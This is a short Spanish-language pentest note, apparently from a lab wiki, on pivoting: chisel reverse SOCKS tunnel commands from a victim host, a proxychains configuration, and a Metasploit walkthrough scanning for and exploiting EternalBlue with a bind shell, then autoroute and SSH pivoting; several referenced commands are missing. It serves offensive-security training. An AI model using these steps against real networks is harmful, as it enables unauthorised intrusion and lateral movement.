Pivoting

Chisel

Para crear un socket usaremos chisel. En la maquina atacante levantamos el chisel server con el comando:

chisel server -p 8000 --reverse

En la maquina victima, nos pasamos el chisel. (Si es windows pasamos el chisel.exe que encontramos en el repositorio oficial)

chisel.exe client 192.168.18.41:8000 R:socks

Con esto levantamos un socks5 en el puerto 1080. Configuramos el archivo de proxychains /etc/proxychains.conf:

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4         127.0.0.1 9050
socks5  127.0.0.1       1080

Luego podemos usar proxychains:

proxychains curl 192.168.172.130

Doble Pivote con Metasploit

Primero empezamos con detectar la ip con windows en la segunda red, la cual es: 192.168.172.143. Verificamos si es vulnerable a eternalblue.

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.172.143                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

Entonces al probar vemos que debemos agregar el socket a la conexion.

Lo agregamos con el siguiente comando:

Y luego podemos ver que si es vulnerable:

Luego usamos el exploit de eternalblue

Elegimos el payload bind_shell, puesto que la maquina objetivo no tienen acceso a nuestra ip pero nosotros si a ella.

Luego actualizamos las direcciones del target.

Luego ingresamos de nuevo el proxy ya que se borra cuando actualizamos con el comando use.

Corremos el exploit para obtener la shell.

Ahora realizamos un ipconfig para verificar las redes presentes.

Entonces, ahora lo que haremos sera realizar un autoroute

Luego podemos realizar un portscan en el puerto 22 para detectar las ips con servicio SSH.

Lo que ahora haremos sera levantar un socket para poder conectarnos por ssh a esa direccion IP.

Ahora podemos configurar de nuevo nuestro proxychains en el socket 9050.

Luego, nos conectamos usando proxychains para verificar que el proxychains esta conectado correctamente.

Last updated